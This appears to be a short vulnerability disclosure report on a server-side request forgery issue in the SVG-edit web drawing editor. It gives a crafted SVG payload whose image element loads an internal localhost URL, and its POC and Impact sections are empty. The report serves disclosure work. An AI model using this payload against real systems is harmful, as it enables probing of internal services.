vulnerability ssrf
severity 7.3
language javascript
registry other

:book: Description

SVG-edit is a fast, web-based, JavaScript-driven SVG drawing editor that works in any modern browser. This package is vulnerable for (SSRF).

:recycle: Steps To Reproduce-:

  1. download and run latest release from Or use demo
  2. open payload svg. Payload used : rc3.svg
<svg xmlns="" xmlns:xlink="" style="position:relative" width="300" height="200" overflow="hidden"><image x="10" y="10" width="276" height="110" xlink:href="http://localhost:8080/svg"/><path d="M0 150h300v10H0z"/></svg>

:telescope: POC

💥 Impact